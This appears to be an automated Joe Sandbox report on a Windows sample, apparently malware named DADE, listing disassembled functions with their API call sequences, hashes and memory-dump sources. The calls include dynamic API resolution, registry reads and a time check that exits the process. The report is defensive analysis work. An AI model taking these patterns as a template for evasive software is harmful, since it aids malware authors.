                                                      • String ID: wwww
                                                      • API String ID: 3317088062-671953474
                                                      • Opcode ID: f69004c5f71f610b6d547f6432eddab92af069e70ec5a533afdf3a811bdd1a6c
                                                      • Instruction ID: 12c68707ac2e319f13cccdfab6b791084b738db5efacad9efc9fb5f7768de77e
                                                      • Opcode Fuzzy Hash: f69004c5f71f610b6d547f6432eddab92af069e70ec5a533afdf3a811bdd1a6c
                                                      • Instruction Fuzzy Hash: 3D01F771A04604ABC7188F58DC4AB6AB76EE784720F10432AFD16D72C0D7B419008AE5
                                                      APIs
                                                      • ??2@YAPAXI@Z.MSVCRT(004078EE,004088DD,03C3C3C3,00000401,004078EE,?,00000000,?,004078EE,80000001), ref: 00408B70
                                                      • std::exception::exception.LIBCMT ref: 00408B8B
                                                      • __CxxThrowException@8.LIBCMT ref: 00408BA0
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1933389004.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000008.00000002.1933389004.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_400000_DADE.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ??2@Exception@8Throwstd::exception::exception
                                                      • String ID: Pv@$x@
                                                      • API String ID: 3448701045-2507878009
                                                      • Opcode ID: 980d6eea7b664cab60e6d86db1e8d11ee68504ae67a5a5b0083e142dd03a954a
                                                      • Instruction ID: d532d441e19495b57cb34d138c3e0c88a0b377879b543fee6e4065129139ec29
                                                      • Opcode Fuzzy Hash: 980d6eea7b664cab60e6d86db1e8d11ee68504ae67a5a5b0083e142dd03a954a
                                                      • Instruction Fuzzy Hash: 37F027B160020997EB18E7E08D027BF7374AF00304F04847EA911E2340FB7CD605819A
                                                      APIs
                                                      • ??2@YAPAXI@Z.MSVCRT(?,00408C9B,00000000,?,?,00000000), ref: 00408D92
                                                      • std::exception::exception.LIBCMT ref: 00408DAD
                                                      • __CxxThrowException@8.LIBCMT ref: 00408DC2
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1933389004.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000008.00000002.1933389004.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_400000_DADE.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ??2@Exception@8Throwstd::exception::exception
                                                      • String ID: Pv@$PC
                                                      • API String ID: 3448701045-1362088297
                                                      • Opcode ID: b42475b819e5296bc50c64d31f11e30ed0ca5ba6e695ecad0727ff97edcd75c6
                                                      • Instruction ID: c1c2e9470fcfd07362e0a09b01d9ac21ad58a2ed8b2a4eb6edd2c0a09cf1513b
                                                      • Opcode Fuzzy Hash: b42475b819e5296bc50c64d31f11e30ed0ca5ba6e695ecad0727ff97edcd75c6
                                                      • Instruction Fuzzy Hash: 9AE02B7050030A97CB18F7B59D016BF73789F10304F40476FE965A22C1EF798504859D
                                                      APIs
                                                        • Part of subcall function 009D9257: ??2@YAPAXI@Z.MSVCRT(00000020), ref: 009D9260
                                                        • Part of subcall function 009F4A67: LoadLibraryA.KERNEL32(0043573C,?,009E79A8), ref: 009F4A6D
                                                        • Part of subcall function 009F4A67: GetProcAddress.KERNEL32(00000000,00435748), ref: 009F4A83
                                                        • Part of subcall function 009F4A67: GetProcAddress.KERNEL32(00000000,00435750), ref: 009F4A94
                                                        • Part of subcall function 009F4A67: GetProcAddress.KERNEL32(00000000,0043575C), ref: 009F4AA5
                                                        • Part of subcall function 009F4A67: GetProcAddress.KERNEL32(00000000,00435768), ref: 009F4AB6
                                                        • Part of subcall function 009F4A67: GetProcAddress.KERNEL32(00000000,00435770), ref: 009F4AC7
                                                        • Part of subcall function 009F4A67: GetProcAddress.KERNEL32(00000000,0043577C), ref: 009F4AD8
                                                        • Part of subcall function 009F4A67: GetProcAddress.KERNEL32(00000000,00435784), ref: 009F4AE9
                                                        • Part of subcall function 009F4A67: GetProcAddress.KERNEL32(00000000,0043578C), ref: 009F4AFA
                                                        • Part of subcall function 009F4A67: GetProcAddress.KERNEL32(00000000,0043579C), ref: 009F4B0B
                                                        • Part of subcall function 009F4A67: GetProcAddress.KERNEL32(00000000,004357A8), ref: 009F4B1C
                                                      • StrCmpCA.SHLWAPI(?,00638AAC), ref: 009E79D7
                                                      • StrCmpCA.SHLWAPI(?,00638C1C), ref: 009E7AAF
                                                      • lstrcpy.KERNEL32(00000000,0042D01C), ref: 009E7AE7
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 009E7B44
                                                        • Part of subcall function 009F74A7: lstrcpy.KERNEL32(00000000), ref: 009F74C1
                                                        • Part of subcall function 009D1677: lstrcpy.KERNEL32(00000000,?), ref: 009D169E
                                                        • Part of subcall function 009D1677: lstrcpy.KERNEL32(00000000,?), ref: 009D16C0
                                                        • Part of subcall function 009D1677: lstrcpy.KERNEL32(00000000,?), ref: 009D16E2
                                                        • Part of subcall function 009D1677: lstrcpy.KERNEL32(00000000,?), ref: 009D1746
                                                        • Part of subcall function 009E5E47: lstrcpy.KERNEL32(00000000,0042D01C), ref: 009E5E7C
                                                        • Part of subcall function 009E5E47: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 009E5EAB
                                                        • Part of subcall function 009E5E47: lstrcpy.KERNEL32(00000000,00000000), ref: 009E5EDC
                                                        • Part of subcall function 009E5E47: lstrcpy.KERNEL32(00000000,00000000), ref: 009E5F04
                                                        • Part of subcall function 009E5E47: lstrcat.KERNEL32(00000000,00000000), ref: 009E5F0F
                                                        • Part of subcall function 009E5E47: lstrcpy.KERNEL32(00000000,00000000), ref: 009E5F37
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1933997313.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_9d0000_DADE.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrcpy$AddressProc$??2@FolderLibraryLoadPathlstrcat
                                                      • String ID:
                                                      • API String ID: 3558977763-0
                                                      • Opcode ID: 6aeff865d584790d0d634a92a901b01971934c05726d59cf815502abfbd14370
                                                      • Instruction ID: c41137b8a27057b4fd38ebcb697f0a6b3ca640d4287a1e9fd277bbc7f4409ca0
                                                      • Opcode Fuzzy Hash: 6aeff865d584790d0d634a92a901b01971934c05726d59cf815502abfbd14370
                                                      • Instruction Fuzzy Hash: D0F18171A042458FCB25DFA9C844B69B7B5BF88324F29C1ADD8089B3A2D735ED41CF91
                                                      APIs
                                                      • StrCmpCA.SHLWAPI(?,00638AAC), ref: 009E79D7
                                                      • StrCmpCA.SHLWAPI(?,00638C1C), ref: 009E7AAF
                                                      • lstrcpy.KERNEL32(00000000,0042D01C), ref: 009E7AE7
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 009E7B44
                                                        • Part of subcall function 009F74A7: lstrcpy.KERNEL32(00000000), ref: 009F74C1
                                                        • Part of subcall function 009D1677: lstrcpy.KERNEL32(00000000,?), ref: 009D169E
                                                        • Part of subcall function 009D1677: lstrcpy.KERNEL32(00000000,?), ref: 009D16C0
                                                        • Part of subcall function 009D1677: lstrcpy.KERNEL32(00000000,?), ref: 009D16E2
                                                        • Part of subcall function 009D1677: lstrcpy.KERNEL32(00000000,?), ref: 009D1746
                                                        • Part of subcall function 009E5E47: lstrcpy.KERNEL32(00000000,0042D01C), ref: 009E5E7C
                                                        • Part of subcall function 009E5E47: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 009E5EAB
                                                        • Part of subcall function 009E5E47: lstrcpy.KERNEL32(00000000,00000000), ref: 009E5EDC
                                                        • Part of subcall function 009E5E47: lstrcpy.KERNEL32(00000000,00000000), ref: 009E5F04
                                                        • Part of subcall function 009E5E47: lstrcat.KERNEL32(00000000,00000000), ref: 009E5F0F
                                                        • Part of subcall function 009E5E47: lstrcpy.KERNEL32(00000000,00000000), ref: 009E5F37
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1933997313.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_9d0000_DADE.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrcpy$FolderPathlstrcat
                                                      • String ID:
                                                      • API String ID: 2938889746-0
                                                      • Opcode ID: 2bebba6af289712f080de957bcbf78d05df3d434af1be4e71e032b38b9078c2a
                                                      • Instruction ID: d02b436869ca7518209c812798d22b29a31b0244c33fa4fad0b1122a71d33792
                                                      • Opcode Fuzzy Hash: 2bebba6af289712f080de957bcbf78d05df3d434af1be4e71e032b38b9078c2a
                                                      • Instruction Fuzzy Hash: 20F16F71E042458FCB25DF69C844A69B7B5AF88324F29C1ADD8089B3A2D731ED42CF91
                                                      APIs
                                                      • StrCmpCA.SHLWAPI(?,00638AAC), ref: 009E79D7
                                                      • StrCmpCA.SHLWAPI(?,00638C1C), ref: 009E7AAF
                                                      • lstrcpy.KERNEL32(00000000,0042D01C), ref: 009E7AE7
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 009E7B44
                                                      • StrCmpCA.SHLWAPI(?,00638D84), ref: 009E7DE4
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1933997313.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_9d0000_DADE.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrcpy
                                                      • String ID:
                                                      • API String ID: 3722407311-0
                                                      • Opcode ID: d89e5a93b16780a4945d7001f8fe04c944c6bc261c0c89bfee13aa78266d6684
                                                      • Instruction ID: 7758c588e595d990f23fb02188d4c0b189d497b58f12b47725a6d0d7b3255127
                                                      • Opcode Fuzzy Hash: d89e5a93b16780a4945d7001f8fe04c944c6bc261c0c89bfee13aa78266d6684
                                                      • Instruction Fuzzy Hash: 4CF15F71E042458FDB25DF69C844A69B7B5AF88324F29C1ADD8089B3A2D731ED42CF91
                                                      APIs
                                                      • StrCmpCA.SHLWAPI(?,00638AAC), ref: 009E79D7
                                                      • StrCmpCA.SHLWAPI(?,00638D84), ref: 009E7DE4
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1933997313.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_9d0000_DADE.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 14cdd88b83ea7d92af237cb005bbb417a3c6d180c2d1a0adcc72aab46658f625
                                                      • Instruction ID: 2f1b07c20eb7e073b5f836d9ee30ef39c780ffc55b1599721abf0041b56efd41
                                                      • Opcode Fuzzy Hash: 14cdd88b83ea7d92af237cb005bbb417a3c6d180c2d1a0adcc72aab46658f625
                                                      • Instruction Fuzzy Hash: A6E16F71E042458FDB25DF69C844B69B7B5AF88324F29C1ADD8089B3A2D731ED42CF91
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1933997313.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_9d0000_DADE.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CodeInfoPageValidmemset
                                                      • String ID:
                                                      • API String ID: 703783727-0
                                                      • Opcode ID: 6eab46f699b87600043b982b3256ab625c67c80558f36cc1ccd8bbca43d4f8ed
                                                      • Instruction ID: ab7f688f9b78ede952fe23e5aff5d281ba32cd494abaa6e2031f8243f4be7d27
                                                      • Opcode Fuzzy Hash: 6eab46f699b87600043b982b3256ab625c67c80558f36cc1ccd8bbca43d4f8ed
                                                      • Instruction Fuzzy Hash: EF313A30A183894FD725AF75C88437ABF949F42314F1845AEEB92DF192C329C805D791
                                                      APIs
                                                      • GetSystemTime.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00421E28), ref: 00421B52
                                                        • Part of subcall function 00421800: lstrcpy.KERNEL32(00000000,0042D01C), ref: 0042182F
                                                        • Part of subcall function 00421800: lstrlenA.KERNEL32(00A543A8,00000000,00000000,?,?,00421B61), ref: 00421840
                                                        • Part of subcall function 00421800: lstrcpy.KERNEL32(00000000,00000000), ref: 00421867
                                                        • Part of subcall function 00421800: lstrcatA.KERNEL32(00000000,00000000), ref: 00421872
                                                        • Part of subcall function 00421800: lstrcpy.KERNEL32(00000000,00000000), ref: 004218A1
                                                        • Part of subcall function 00421800: lstrlenA.KERNEL32(00435564,?,?,00421B61), ref: 004218B3
                                                        • Part of subcall function 00421800: lstrcpy.KERNEL32(00000000,00000000), ref: 004218D4
                                                        • Part of subcall function 00421800: lstrcatA.KERNEL32(00000000,00435564,?,?,00421B61), ref: 004218E0
                                                        • Part of subcall function 00421800: lstrcpy.KERNEL32(00000000,00000000), ref: 0042190F
                                                      • sscanf.NTDLL ref: 00421B7A
                                                      • SystemTimeToFileTime.KERNEL32(?,?), ref: 00421B96
                                                      • SystemTimeToFileTime.KERNEL32(?,?), ref: 00421BA6
                                                      • ExitProcess.KERNEL32 ref: 00421BC3
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1933389004.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000008.00000002.1933389004.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_400000_DADE.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Timelstrcpy$System$Filelstrcatlstrlen$ExitProcesssscanf
                                                      • String ID:
                                                      • API String ID: 3040284667-0
                                                      • Opcode ID: a2f6735c031ea2f4695345a85905500a2208e9f846abe19c5e0427cdd94a5bb9
                                                      • Instruction ID: 74431add482d266e5f481d4c3f26529432deb7ac332c40e3c7ddf6828a7bb522
                                                      • Opcode Fuzzy Hash: a2f6735c031ea2f4695345a85905500a2208e9f846abe19c5e0427cdd94a5bb9
                                                      • Instruction Fuzzy Hash: BD2102B1508301AF8344EF69D88485BBBF9EFD8304F409A1EF5A9C3220E774E5048FA6
                                                      APIs
                                                      • GetSystemTime.KERNEL32(?), ref: 009F1DB9
                                                        • Part of subcall function 009F1A67: lstrcpy.KERNEL32(00000000,0042D01C), ref: 009F1A96
                                                        • Part of subcall function 009F1A67: lstrlen.KERNEL32(00638DEC), ref: 009F1AA7
                                                        • Part of subcall function 009F1A67: lstrcpy.KERNEL32(00000000,00000000), ref: 009F1ACE
                                                        • Part of subcall function 009F1A67: lstrcat.KERNEL32(00000000,00000000), ref: 009F1AD9
                                                        • Part of subcall function 009F1A67: lstrcpy.KERNEL32(00000000,00000000), ref: 009F1B08
                                                        • Part of subcall function 009F1A67: lstrlen.KERNEL32(00435564), ref: 009F1B1A
                                                        • Part of subcall function 009F1A67: lstrcpy.KERNEL32(00000000,00000000), ref: 009F1B3B
                                                        • Part of subcall function 009F1A67: lstrcat.KERNEL32(00000000,00435564), ref: 009F1B47
                                                        • Part of subcall function 009F1A67: lstrcpy.KERNEL32(00000000,00000000), ref: 009F1B76
                                                      • sscanf.NTDLL ref: 009F1DE1
                                                      • SystemTimeToFileTime.KERNEL32(?,?), ref: 009F1DFD
                                                      • SystemTimeToFileTime.KERNEL32(?,?), ref: 009F1E0D
                                                      • ExitProcess.KERNEL32 ref: 009F1E2A
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1933997313.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_9d0000_DADE.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Timelstrcpy$System$Filelstrcatlstrlen$ExitProcesssscanf
                                                      • String ID:
                                                      • API String ID: 3040284667-0
                                                      • Opcode ID: 0a1ad68ea18747a319e8a45fd1f50d4604905386d8ae97549ccd0aa624e14989
                                                      • Instruction ID: 574c77ab99812114c287093720c5e36805413abb0f5eb771472cb30fdc9ca811
                                                      • Opcode Fuzzy Hash: 0a1ad68ea18747a319e8a45fd1f50d4604905386d8ae97549ccd0aa624e14989
                                                      • Instruction Fuzzy Hash: 7221E2B1518301AF8344DF69D8859ABBBF9EED8314F409A1EF599C3220E770D6048FA6
                                                      APIs
                                                      • memcpy.MSVCRT(?,?,00000040), ref: 00406E40
                                                      • memcpy.MSVCRT(?,00005A4D,000000F8), ref: 00406E7C
                                                      • GetProcessHeap.KERNEL32(00000008,?), ref: 00406EB4
                                                      • HeapAlloc.KERNEL32(00000000), ref: 00406EBB
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1933389004.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000008.00000002.1933389004.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_400000_DADE.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Heapmemcpy$AllocProcess
                                                      • String ID: @
                                                      • API String ID: 1643994569-2766056989
                                                      • Opcode ID: 9d0aa672cad1b422e85df3b0c0ffa8adf9295387143c5de3d490c1a63fad8456
                                                      • Instruction ID: b28c2e2eafd009aece7dfa75dd6d3a6e0d6a1e6899dabcaa8fc792e54f3dbcc7
                                                      • Opcode Fuzzy Hash: 9d0aa672cad1b422e85df3b0c0ffa8adf9295387143c5de3d490c1a63fad8456
                                                      • Instruction Fuzzy Hash: 9C1161706007129BEB258B61DC84BB773E4EB40701F454439EA47DB684FFB8D950CB99
                                                      APIs
                                                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 009D127C
                                                      • RtlAllocateHeap.NTDLL(00000000), ref: 009D1283
                                                      • RegOpenKeyExA.ADVAPI32(80000001,00431D24,00000000,00020119,?), ref: 009D12A0
                                                      • RegQueryValueExA.ADVAPI32(?,00431D18,00000000,00000000,00000000,000000FF), ref: 009D12BA
                                                      • RegCloseKey.ADVAPI32(?), ref: 009D12C4
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1933997313.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_9d0000_DADE.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                                      • String ID:
                                                      • API String ID: 3225020163-0
                                                      • Opcode ID: c6adfcbbf362e72c312c20df80564037ba3fc04d8fe2fd2ec6ad55297d477a0e
                                                      • Instruction ID: d38f4bf7ad744d1dcac99df0c80df4a1e63714bf508aafac83d4ab88fad08206
                                                      • Opcode Fuzzy Hash: c6adfcbbf362e72c312c20df80564037ba3fc04d8fe2fd2ec6ad55297d477a0e
                                                      • Instruction Fuzzy Hash: F5F09075A40308BFD7049BE09C4DFEB7B7DEB04755F100059BE05E2280D7B05A048BE0
                                                      APIs
                                                      • __getptd.LIBCMT ref: 009F9274
                                                        • Part of subcall function 009F8A96: __getptd_noexit.LIBCMT ref: 009F8A99
                                                        • Part of subcall function 009F8A96: __amsg_exit.LIBCMT ref: 009F8AA6
                                                      • __getptd.LIBCMT ref: 009F928B
                                                      • __amsg_exit.LIBCMT ref: 009F9299
                                                      • __lock.LIBCMT ref: 009F92A9
                                                      • __updatetlocinfoEx_nolock.LIBCMT ref: 009F92BD
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1933997313.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_9d0000_DADE.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                      • String ID:
                                                      • API String ID: 938513278-0
                                                      • Opcode ID: 597a1c53584a699b3bced9a2b76091cfa842eeb3be3d7ba8d5d4667430613e89
                                                      • Instruction ID: 6a8f97b69abef1c86ae9b7bf825c55ead6a0b5d413617da9a09ff56afa78f29c
                                                      • Opcode Fuzzy Hash: 597a1c53584a699b3bced9a2b76091cfa842eeb3be3d7ba8d5d4667430613e89
                                                      • Instruction Fuzzy Hash: 21F0B43290870CAFDB61BBB89803BBE73A0AF40720F11050AF725671C2DB649A40DB59
                                                      APIs
                                                      • lstrcpy.KERNEL32(00000000,0042D01C), ref: 00423E45
                                                      • lstrcpy.KERNEL32(00000000,00A796F0), ref: 00423E6F
                                                      • GetSystemTime.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,00404D2A,?,00000014), ref: 00423E79
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1933389004.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000008.00000002.1933389004.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
